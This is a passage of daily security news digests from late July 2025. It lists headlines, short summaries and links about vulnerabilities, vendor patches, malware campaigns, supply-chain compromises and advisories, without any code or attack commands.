---------------------------------------------
Lenovo is warning about high-severity BIOS flaws that could allow attackers to potentially bypass Secure Boot in all-in-one desktop PC models that use customized Insyde UEFI (Unified Extensible Firmware Interface).
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-lenovo-uefi-firmware-upd…
∗∗∗ Apple Patches Safari Vulnerability Also Exploited as Zero-Day in Google Chrome ∗∗∗
---------------------------------------------
Apple on Tuesday released security updates for its entire software portfolio, including a fix for a vulnerability that Google said was exploited as a zero-day in the Chrome web browser earlier this month. The vulnerability, tracked as CVE-2025-6558 (CVSS score: 8.8), is an incorrect validation of untrusted input in the browser's ANGLE and GPU components that could result in a sandbox escape via a crafted HTML page.
---------------------------------------------
https://thehackernews.com/2025/07/apple-patches-safari-vulnerability-also.h…
∗∗∗ Critical Dahua Camera Flaws Enable Remote Hijack via ONVIF and File Upload Exploits ∗∗∗
---------------------------------------------
Cybersecurity researchers have disclosed now-patched critical security flaws in the firmware of Dahua smart cameras that, if left unaddressed, could allow attackers to hijack control of susceptible devices.
---------------------------------------------
https://thehackernews.com/2025/07/critical-dahua-camera-flaws-enable.html
∗∗∗ Autodesk Security Advisory 29.07.2025 ∗∗∗
---------------------------------------------
Certain Autodesk products use a shared component that is affected by multiple vulnerabilities listed below. Exploitation of these vulnerabilities can lead to code execution. Exploitation of these vulnerabilities requires user interaction.
---------------------------------------------
https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0015
∗∗∗ Security updates: attackers can access Dell ECS and ObjectScale ∗∗∗
---------------------------------------------
Attackers can access Dell Elastic Cloud Storage (ECS) and ObjectScale with comparatively little effort. Companies use these products to build cloud storage, among other things. If important data is stored there, unauthorized access can have far-reaching consequences. Security updates close the vulnerability.
---------------------------------------------
https://www.heise.de/news/Sicherheitsupdates-Angreifer-koennen-auf-Dell-ECS…
∗∗∗ Stable Channel Update for Desktop ∗∗∗
---------------------------------------------
The Stable channel has been updated to 138.0.7204.183/.184 for Windows, Mac and 138.0.7204.183 for Linux which will roll out over the coming days/weeks. This update includes 4 security fixes.
---------------------------------------------
http://chromereleases.googleblog.com/2025/07/stable-channel-update-for-desk…
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (firefox, icu, kernel-rt, libtpms, redis:6, redis:7, and sqlite), Fedora (chromium and cloud-init), Oracle (icu, java-1.8.0-openjdk, java-21-openjdk, kernel, nodejs:22, perl, and sqlite), SUSE (docker, java-1_8_0-openj9, libxml2, python-starlette, and thunderbird), and Ubuntu (cloud-init, linux-azure, linux-azure-5.4, linux-azure-fips, linux-raspi, linux-raspi-5.4, and perl).
---------------------------------------------
https://lwn.net/Articles/1031919/
∗∗∗ Dental practice management system (PVS): security vulnerabilities in CGM Z1 – part 1 ∗∗∗
---------------------------------------------
CompuGroup Medical (CGM) also sells a practice management system (PVS) for dentists. According to the company, the system is in use at more than 7,000 dentists. Early this year, a source wishing to remain anonymous informed me about potential security problems in this software. In the meantime there has been a software update that is supposed to have resolved these problems. I will summarize the matter in a few blog posts.
---------------------------------------------
https://www.borncity.com/blog/2025/07/30/sicherheit-beim-zahnarzt-pvs-z1/
∗∗∗ Delta Electronics DTN Soft ∗∗∗
---------------------------------------------
According to Delta Electronics, if a version of DTN Soft prior to v2.1.0 is installed, it should be updated to v2.1.0 or later. If DTM Soft is also installed, it should be updated to v1.6.0.0 (released on March 25, 2025) or later. Successful exploitation of this vulnerability could allow an attacker to use a specially crafted project file to execute arbitrary code.
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-25-210-03
∗∗∗ TP-Link Archer C50 router is vulnerable to configuration-file decryption ∗∗∗
---------------------------------------------
https://kb.cert.org/vuls/id/554637
∗∗∗ Security update for Tenable Patch Management Fixes One Vulnerability ∗∗∗
---------------------------------------------
https://www.tenable.com/security/tns-2025-15
∗∗∗ CISA: Security update for National Instruments LabVIEW ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-25-210-01
∗∗∗ CISA: Security update for Samsung HVAC DMS ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-25-210-02
=====================
= End-of-Day report =
=====================
Timeframe: Monday 28-07-2025 18:00 − Tuesday 29-07-2025 18:00
Handler: Guenes Holler
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ OpenAI’s ChatGPT Agent casually clicks through “I am not a robot” verification test ∗∗∗
---------------------------------------------
On Friday, OpenAI's new ChatGPT Agent, which can perform multistep tasks for users, proved it can pass through one of the Internet's most common security checkpoints by clicking Cloudflare's anti-bot verification—the same checkbox that's supposed to keep automated programs like itself at bay.
---------------------------------------------
https://arstechnica.com/information-technology/2025/07/openais-chatgpt-agen…
∗∗∗ Exploit available for critical Cisco ISE bug exploited in attacks ∗∗∗
---------------------------------------------
Security researcher Bobby Gould has published a blog post demonstrating a complete exploit chain for CVE-2025-20281, an unauthenticated remote code execution vulnerability in Cisco Identity Services Engine (ISE).
---------------------------------------------
https://www.bleepingcomputer.com/news/security/exploit-available-for-critic…
∗∗∗ Endgame Gear mouse config tool infected users with malware ∗∗∗
---------------------------------------------
Gaming peripherals maker Endgame Gear is warning that malware was hidden in its configuration tool for the OP1w 4k v2 mouse hosted on the official website between June 26 and July 9, 2025. The infected file was hosted on 'endgamegear.com/gaming-mice/op1w-4k-v2,' so users downloading the tool from that page during this period were infected.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/endgame-gear-mouse-config-to…
∗∗∗ Critical Flaw in Vibe-Coding Platform Base44 Exposed Apps ∗∗∗
---------------------------------------------
The rise of "vibe coding" platforms that enable developers to build software with minimal traditional coding could create a slew of new security risks for organizations. A recent example is a now-patched vulnerability in the Base44 AI-powered development platform that allowed unauthorized users to gain complete access to private enterprise applications hosted on the service.
---------------------------------------------
https://www.darkreading.com/application-security/critical-flaw-vibe-coding-…
∗∗∗ Parasitic Sharepoint Exploits ∗∗∗
---------------------------------------------
Last week, newly exploited SharePoint vulnerabilities took a lot of our attention. It is fair to assume that last Monday (July 21st), all exposed vulnerable SharePoint installs were exploited. Of course, there is nothing to prevent multiple exploitation of the same instance, and a lot of that certainly happened. But why exploit it yourself if you can just take advantage of backdoors left behind by prior exploits? A number of these backdoors were widely publicised. The initial backdoor, "spinstall0.aspx", was frequently observed, and Microsoft listed various variations of this filename [1].
---------------------------------------------
https://isc.sans.edu/diary/rss/32148
∗∗∗ Checking Windows for outdated libcurl libraries in programs ∗∗∗
---------------------------------------------
Microsoft frequently ships the cURL library in outdated versions that contain security vulnerabilities. Software packages also come bundled with ancient libcurl files. How can I check whether any such legacy remnants are lurking on my systems?
---------------------------------------------
https://www.borncity.com/blog/2025/07/29/software-und-die-veralteten-libcur…
∗∗∗ Gunra Ransomware Group Unveils Efficient Linux Variant ∗∗∗
---------------------------------------------
Gunra ransomware was first observed in April 2025 in a campaign that targeted Windows systems using techniques inspired by the infamous Conti ransomware. Our monitoring of the ransomware landscape revealed that threat actors behind Gunra have expanded with a Linux variant, signaling a strategic move toward cross-platform targeting.
---------------------------------------------
https://www.trendmicro.com/en_us/research/25/g/gunra-ransomware-linux-varia…
∗∗∗ SAP NetWeaver Vulnerability Used in Auto-Color Malware Attack on US Firm ∗∗∗
---------------------------------------------
Darktrace uncovers the first exploit of a critical SAP NetWeaver vulnerability (CVE-2025-31324) to deploy Auto-Color backdoor malware. Learn how this evasive Linux RAT targets systems for remote code execution and how AI-powered defence thwarts multi-stage attacks.
---------------------------------------------
https://hackread.com/sap-netweaver-vulnerability-auto-color-malware-us-firm/
∗∗∗ Stack Overflows, Heap Overflows, and Existential Dread (SonicWall SMA100 CVE-2025-40596, CVE-2025-40597 and CVE-2025-40598) ∗∗∗
---------------------------------------------
Our initial journey started with analyzing SonicWall N-days that were receiving coveted attention from our friendly APT groups. But somewhere along the way - deep in a fog of malformed headers and reverse proxy shenanigans - we stumbled across vulnerabilities that feel like they were preserved in amber from a more naïve era of C programming.
---------------------------------------------
https://labs.watchtowr.com/stack-overflows-heap-overflows-and-existential-d…
∗∗∗ Security: CERT@VDE becomes the first German coordination centre for security vulnerabilities ∗∗∗
---------------------------------------------
For the past few days, the security and computer emergency team of the electrical engineering and IT association VDE has played a more important role internationally. The industry association announced on Friday that its own Computer Emergency Response Team, CERT@VDE, has been elevated to the central body in the fight against IT security vulnerabilities in the field of industrial automation, with a focus on small and medium-sized enterprises. Its work coordinating security problems in this sector thus takes on worldwide significance.
---------------------------------------------
https://heise.de/-10502241
∗∗∗ Attacking GenAI applications and LLMs – Sometimes all it takes is to ask nicely! ∗∗∗
---------------------------------------------
Generative AI and LLM technologies have shown great potential in recent years, and for this reason, an increasing number of applications are starting to integrate them for multiple purposes. These applications are becoming increasingly complex, adopting approaches that involve multiple specialized agents, each focused on one or more tasks, interacting with one another and using external tools to access information, perform operations, or carry out tasks that LLMs are not capable of handling directly (e.g., mathematical computations).
---------------------------------------------
https://security.humanativaspa.it/attacking-genai-applications-and-llms-som…
=====================
= Vulnerabilities =
=====================
∗∗∗ CVE-2025-26397 - ZDI-25-654: SolarWinds TFTP Server Deserialization of Untrusted Data Local Privilege Escalation Vulnerability ∗∗∗
---------------------------------------------
This vulnerability allows local attackers to escalate privileges on affected installations of SolarWinds TFTP Server. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the internal TFTP communications endpoint, which listens on the localhost interface on TCP port 8099 by default. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-25-654/
∗∗∗ Patch now! Attacks on PaperCut NG/MF observed ∗∗∗
---------------------------------------------
Because of attacks currently under way, admins should make sure they have a current release of the PaperCut NG/MF print management software installed. If attacks succeed, in the worst case attackers can push malicious code onto systems and execute it. Security updates have been available for some time.
---------------------------------------------
https://www.heise.de/news/Jetzt-patchen-Attacken-auf-PaperCut-NG-MF-beobach…
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (freerdp, git-lfs, golang-github-openprinting-ipp-usb, grafana, grafana-pcp, icu, ipa, iputils, krb5, libvpx, nodejs:22, osbuild-composer, perl, python-tornado, qt6-qtbase, sqlite, unbound, valkey, wireshark, and yggdrasil), Debian (libfastjson and php8.2), Fedora (glibc), Oracle (firefox, icu, perl, and unbound), Red Hat (389-ds-base, glib2, icu, libtpms, redis:6, redis:7, and yelp), SUSE (boost, forgejo-longterm, java-11-openj9, java-17-openj9, java-1_8_0-openj9, kernel, nginx, and salt), and Ubuntu (linux-xilinx-zynqmp, openjdk-8, openjdk-lts, poppler, and sqlite3).
---------------------------------------------
https://lwn.net/Articles/1031812/
∗∗∗ Samsung Security Updates for Smart TV, Audio and Displays ∗∗∗
---------------------------------------------
https://security.samsungtv.com/securityUpdates
∗∗∗ CVE-2025-2179 GlobalProtect App: Non Admin User Can Disable the GlobalProtect App (Severity: MEDIUM) ∗∗∗
---------------------------------------------
https://security.paloaltonetworks.com/CVE-2025-2179
=====================
= End-of-Day report =
=====================
Timeframe: Friday 25-07-2025 18:00 − Monday 28-07-2025 18:00
Handler: Felician Fuchs
Co-Handler: Guenes Holler
=====================
= News =
=====================
∗∗∗ Supply-chain attacks on open source software are getting out of hand ∗∗∗
---------------------------------------------
It has been a busy week for supply-chain attacks targeting open source software available in public repositories, with successful breaches of multiple developer accounts that resulted in malicious packages being pushed to unsuspecting users.
---------------------------------------------
https://arstechnica.com/security/2025/07/open-source-repositories-are-seein…
∗∗∗ Amazon AI coding agent hacked to inject data wiping commands ∗∗∗
---------------------------------------------
As reported by 404 Media, on July 13, a hacker using the alias ‘lkmanka58’ added unapproved code on Amazon Q’s GitHub to inject a defective wiper that wouldn’t cause any harm, but rather sent a message about AI coding security.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/amazon-ai-coding-agent-hacke…
∗∗∗ Sophisticated Shuyal Stealer Targets 19 Browsers, Demonstrates Advanced Evasion ∗∗∗
---------------------------------------------
A new infostealing malware making the rounds can exfiltrate credentials and other system data even from browsing software considered more privacy-focused than mainstream options.
---------------------------------------------
https://www.darkreading.com/endpoint-security/shuyal-stealer-targets-19-bro…
∗∗∗ French submarine secrets surface after cyber attack ∗∗∗
---------------------------------------------
European defence giant Naval Group has confirmed that it is investigating an alleged cyber attack which has seen what purports to be sensitive internal data published on the internet by hackers.
---------------------------------------------
https://www.bitdefender.com/en-us/blog/hotforsecurity/french-submarine-secr…
∗∗∗ The Homograph Illusion: Not Everything Is As It Seems ∗∗∗
---------------------------------------------
A subtle yet dangerous email attack vector: homograph attacks. Threat actors are using visually similar, non-Latin characters to bypass security filters.
---------------------------------------------
https://unit42.paloaltonetworks.com/homograph-attacks/
∗∗∗ ToxicPanda: The Android Banking Trojan Targeting Europe ∗∗∗
---------------------------------------------
What is ToxicPanda? Bitsight Trace dives into detail on the banking malware, from impact breadth, delivery, technical analysis, and more.
---------------------------------------------
https://www.bitsight.com/blog/toxicpanda-android-banking-malware-2025-study
∗∗∗ EU satellite internet: UK, Norway and Ukraine can join IRIS2 ∗∗∗
---------------------------------------------
EU Space Commissioner Kubilius has invited European non-member states to fully participate in the IRIS2 satellite network, which is intended as an alternative to Starlink.
---------------------------------------------
https://www.heise.de/news/EU-Satelliteninternet-UK-Norwegen-und-Ukraine-koe…
∗∗∗ How I hacked my washing machine ∗∗∗
---------------------------------------------
If you've known me for some amount of time you knew this was something that was bound to happen eventually. Yesterday (and technically today), me and a friend went on an endeavor to hack our washing machine, partially for the fun of it, and partially because there's actually a practical use for it.
---------------------------------------------
https://nexy.blog/2025/07/27/how-i-hacked-my-washing-machine/
∗∗∗ Protecting the Evidence in Real-Time with KQL Queries ∗∗∗
---------------------------------------------
A few weeks ago, I published a post titled Detecting Ransomware Final Stage Activities with KQL Queries where I shared different phases and detections during the last phase of a ransomware attack. Every time I read it, I realize just how broad and complex this topic truly is.
---------------------------------------------
https://detect.fyi/protecting-the-evidence-in-real-time-with-kql-queries-ac…
∗∗∗ Lionishackers: Analyzing a corporate database seller ∗∗∗
---------------------------------------------
Outpost24’s threat intelligence researchers have been analyzing a corporate database seller known as "Lionishackers". They’re a financially motivated threat actor focused on exfiltrating and selling corporate databases. This post explores how they operate, where their attacks are taking place, and the current level of threat they pose.
---------------------------------------------
https://outpost24.com/blog/lionishackers-corporate-database-seller/
=====================
= Vulnerabilities =
=====================
∗∗∗ Post SMTP plugin flaw exposes 200K WordPress sites to hijacking attacks ∗∗∗
---------------------------------------------
More than 200,000 WordPress websites are using a vulnerable version of the Post SMTP plugin that allows hackers to take control of the administrator account.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/post-smtp-plugin-flaw-expose…
∗∗∗ Critical Flaws in Niagara Framework Threaten Smart Buildings and Industrial Systems Worldwide ∗∗∗
---------------------------------------------
Cybersecurity researchers have discovered over a dozen security vulnerabilities impacting Tridium's Niagara Framework that could allow an attacker on the same network to compromise the system under certain circumstances.
---------------------------------------------
https://thehackernews.com/2025/07/critical-flaws-in-niagara-framework.html
∗∗∗ Support expired: admin attack on LG network camera LNV5110R possible ∗∗∗
---------------------------------------------
The LNV5110R network camera from LG Innotek should no longer be used: the US security agency CISA (Cybersecurity & Infrastructure Security Agency) warns of a security vulnerability for which there will be no security update.
---------------------------------------------
https://www.heise.de/news/Support-ausgelaufen-Admin-Attacke-auf-LG-Netzwerk…
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (audiofile, libcaca, libetpan, libxml2, php7.4, snapcast, and thunderbird), Fedora (glibc, iputils, mingw-binutils, and thunderbird), Red Hat (kernel, kernel-rt, mod_auth_openidc, and mod_auth_openidc:2.3), SUSE (afterburn, apache2, atop, chromedriver, chromium, cloud-init, deepin-feature-enable, firefox, firefox-esr, grafana, grype-db, gstreamer-plugins-bad, javamail, jupyter-jupyterlab-templates, jupyter-nbdime, konsole, libetebase, libxmp, minio-client-20250721T052808Z, MozillaFirefox, MozillaFirefox-branding-SLE, opera, pdns-recursor, perl-Authen-SASL, polkit, python-Django, python3-pycares, python311-starlette, rpi-imager, ruby3.4-rubygem-thor, spdlog, thunderbird, varnish, viewvc, and xtrabackup), and Ubuntu (openjdk-21-crac).
---------------------------------------------
https://lwn.net/Articles/1031667/
∗∗∗ Security problem: hard-coded credentials put PCs with MyASUS at risk ∗∗∗
---------------------------------------------
The MyASUS app can become an entry point for attackers. The cause is two security vulnerabilities, which have meanwhile been closed. Anyone who does not update the tool risks unauthorised access to certain services.
---------------------------------------------
https://www.heise.de/news/Sicherheitsproblem-Hartkodierte-Zugangsdaten-gefa…
∗∗∗ SyStrack LsiAgent.exe contains an improper DLL search order, allowing an attacker to execute arbitrary code and priv esc ∗∗∗
---------------------------------------------
https://kb.cert.org/vuls/id/335798
∗∗∗ Multiple stored cross-site scripting vulnerabilities in the Optimizely Episerver content management system ∗∗∗
---------------------------------------------
https://sec-consult.com/de/vulnerability-lab/advisory/mehrere-stored-cross-…
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 24-07-2025 18:00 − Friday 25-07-2025 18:00
Handler: Guenes Holler
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Hacker sneaks infostealer malware into early access Steam game ∗∗∗
---------------------------------------------
A threat actor called EncryptHub has compromised a game on Steam to distribute info-stealing malware to unsuspecting users downloading the title. A few days ago, the hacker (also tracked as Larva-208), injected malicious binaries into the Chemia game files hosted on Steam.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hacker-sneaks-infostealer-ma…
∗∗∗ New Koske Linux malware hides in cute panda images ∗∗∗
---------------------------------------------
A new Linux malware named Koske may have been developed with artificial intelligence and is using seemingly benign JPEG images of panda bears to deploy malware directly into system memory. Researchers from cybersecurity company AquaSec analyzed Koske and described it as "a sophisticated Linux threat." Based on the observed adaptive behavior, the researchers believe that the malware was developed using large language models (LLMs) or automation frameworks.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-koske-linux-malware-hide…
∗∗∗ CastleLoader Malware Infects 469 Devices Using Fake GitHub Repos and ClickFix Phishing ∗∗∗
---------------------------------------------
Cybersecurity researchers have shed light on a new versatile malware loader called CastleLoader that has been put to use in campaigns distributing various information stealers and remote access trojans (RATs). The activity employs Cloudflare-themed ClickFix phishing attacks and fake GitHub repositories opened under the names of legitimate applications, Swiss cybersecurity company PRODAFT said in a report shared with The Hacker News.
---------------------------------------------
https://thehackernews.com/2025/07/castleloader-malware-infects-469.html
∗∗∗ Phishers Target Aviation Execs to Scam Customers ∗∗∗
---------------------------------------------
KrebsOnSecurity recently heard from a reader whose boss’s email account got phished and was used to trick one of the company’s customers into sending a large payment to scammers. An investigation into the attacker’s infrastructure points to a long-running Nigerian cybercrime ring that is actively targeting established companies in the transportation and aviation industries.
---------------------------------------------
https://krebsonsecurity.com/2025/07/phishers-target-aviation-execs-to-scam-…
∗∗∗ From Help Desk to Hypervisor: Defending Your VMware vSphere Estate from UNC3944 ∗∗∗
---------------------------------------------
In mid-2025, Google Threat Intelligence Group (GTIG) identified a sophisticated and aggressive cyber campaign targeting multiple industries, including retail, airline, and insurance. This was the work of UNC3944, a financially motivated threat group that has exhibited overlaps with public reporting of "0ktapus," "Octo Tempest," and "Scattered Spider." Following public alerts from the Federal Bureau of Investigation (FBI), the group's targeting became clear. GTIG observed that the group was suspected of turning its ransomware and extortion operations to the U.S. retail sector. The campaign soon broadened further, with airline and transportation organizations in North America having also become targets.
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/defending-vsphere-…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (git, kernel, nginx:1.24, and sudo), Fedora (dpkg, java-21-openjdk, java-25-openjdk, java-latest-openjdk, and valkey), Oracle (apache-commons-vfs, sudo, tigervnc, and xorg-x11-server), Red Hat (kernel, krb5, and openssh), SUSE (gnutls, ImageMagick, iputils, kernel-livepatch-MICRO-6-0-RT_Update_10, kubernetes1.18, libarchive, ovmf, python, and salt), and Ubuntu (iputils, linux-aws-6.14, linux-raspi, openjdk-21, and openjdk-24).
---------------------------------------------
https://lwn.net/Articles/1031426/
∗∗∗ Attacks against Citrix Netscaler CVE-2025-6543 ∗∗∗
---------------------------------------------
https://www.cert.at/de/aktuelles/2025/7/angriffe-gegen-citrix-netscaler-cve…
∗∗∗ CVE-2025-38350 - ZDI-25-651: (Pwn2Own) Red Hat Enterprise Linux CBS Packet Scheduling Use-After-Free Local Privilege Escalation Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-25-651/
∗∗∗ Cisco Identity Services Engine Unauthenticated Remote Code Execution Vulnerabilities ∗∗∗
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
∗∗∗ CISA Releases Six Industrial Control Systems Advisories ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2025/07/24/cisa-releases-six-indust…
∗∗∗ Medtronic MyCareLink Patient Monitor ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-205-01